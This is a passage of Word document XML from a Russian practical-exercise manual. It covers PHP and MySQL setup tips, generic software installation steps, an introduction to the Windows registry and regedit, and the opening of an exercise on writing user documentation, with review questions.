          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Notice: Undefined variable: msg in C:/Main/addrec.php on line 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Это не ошибка — это рекомендации по кодированию, сообщающие о неинициализированных переменных. Следует отключить вывод подобных рекомендаций в файле php.ini. Найдите директиву error_reporting и установите ее значение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>error_reporting = E_ALL &amp; ~E_NOTICE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Иногда возникают проблемы с установкой MySQL. Следует проконтролировать запускается ли MySQL в качестве сервиса каждый раз при старте системы. Для этого откройте консоль сервисов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск | Настройка | Панель управления | Администрирование | Службы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>найдите там MySQL - запустите. Чтобы сервер стартовал при каждой загрузке системы нажмите правую кнопку мыши на сервисе и выберите «Свойства» - в открывшемся выпадающем списке «Тип запуска» выберите пункт «Авто».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. Проверить системные требования устанавливаемого программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10. Удостовериться, что на диске присутствует достаточно места для установки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11. Запустить программу установки от имени администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12. Внимательно ознакомиться с лицензионным соглашением.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13. Если вас устраивают все пункты лицензионного соглашения, необходимо подтвердить его и продолжить установку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14. Выбрать системный раздел и конечный путь для установки программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15. Настроить устанавливаемые компоненты продукта, или же выпрать рекомендуемый набор компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>16. Провести инсталляцию программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету: Отчет должен содержать скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Как проверить системные требования устанавливаемого программного обеспечения? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B25E6" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Как запустить программу установки от имени администратора?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Как выбрать системный раздел и конечный путь для установки программы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Как настроить устанавливаемые компоненты продукта, или же выпрать рекомендуемый набор компонентов?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Как провести инсталляцию программы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B25E6" w:rsidRPr="00617AC0" w:rsidRDefault="00EE0544" w:rsidP="00EE0544">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Toc26278741"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 2</w:t>
      </w:r>
      <w:r w:rsidR="00F63AE5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B0139B" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диагностика программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
      <w:r w:rsidR="00B0139B" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B6A" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> научится использовать реестр, для просмотра и настройки безопасности системы, ознакомиться с операциями, направленными на оптимизацию работы операци-онной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594698" w:rsidRPr="00617AC0" w:rsidRDefault="00594698" w:rsidP="00594698">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00594698" w:rsidRPr="00617AC0" w:rsidRDefault="00594698" w:rsidP="00594698">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Использование редактора реестра операционной системы Windows при диагностике и оптимизации ПО и ОС Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B6A" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход</w:t>
      </w:r>
      <w:r w:rsidR="00293B6A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B6A" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Ознакомиться с теоретическими сведениями </w:t>
      </w:r>
      <w:r w:rsidR="00B0139B" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> реестр</w:t>
      </w:r>
      <w:r w:rsidR="00B0139B" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ОС Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B6A" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Выполнить предложенные задания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B6A" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Продемонстрировать результаты выполнения предложенных заданий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B6A" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Подготовить отчет о выполнении лабораторной работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594698" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Теоретические сведения </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Работа с реестром в Windows 10 Реестр – особая часть операционной системы Windows, которая представляет собой базу данных из всех параметров или настроек ОС. Все опции Панели управления и других мест системы, где есть возможность изменения каких-либо параметров, зафиксированы в реестре. Там же хранятся данные о путях к файлам, о расположении установленных программ и других моментах, связанных с функционированием Windows. Настраивать и оптимизировать ОС можно также и с помощью сторонних программ. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B6A" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Местонахождение</w:t>
      </w:r>
      <w:r w:rsidR="00F63AE5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Физически реестр состоит из группы файлов, которые хранятся в папке System32\config. При загрузке ОС из этих файлов собирается база данных с текущими параметрами, которые и применяются в работе Windows. Эта база состоит из пяти главных веток. Редактировать файлы из указанного каталога напрямую не рекомендуется, поскольку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>для того, чтобы войти в реестр Windows 10, существует специальный инструмент, зовущийся regedit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Редактор реестра Запуск редактора значений реестра осуществляется следующим образом: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Щелкнуть по поисковой строке на панели задач или воспользоваться сочетанием клавиш Win + S. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Вписать в текстовое поле команду «regedit». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B25E6" w:rsidRPr="00617AC0" w:rsidRDefault="00293B6A" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. При появлении результатов поиска нажать на кнопку «выполнить команду».</w:t>
      </w:r>
      <w:r w:rsidR="001668B3" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое реестр?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Из чего физически состоит реестр?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000767EE" w:rsidRPr="00617AC0" w:rsidRDefault="000767EE" w:rsidP="00293B6A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Как выполнить Запуск редактора?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc26278742"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 23 Составление пользовательской документации к программному продукту</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="008333B2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc495578201"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: формирование навыков </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">сопровождения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidR="0009139F" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0009139F" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>составление пользовательской документации к программному продукту</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00824CBE" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008333B2" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ознакомиться с процедурой составления пользовательской (эксплутационной) документации к программному продукту</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00824CBE" w:rsidP="0009139F">
      <w:pPr>
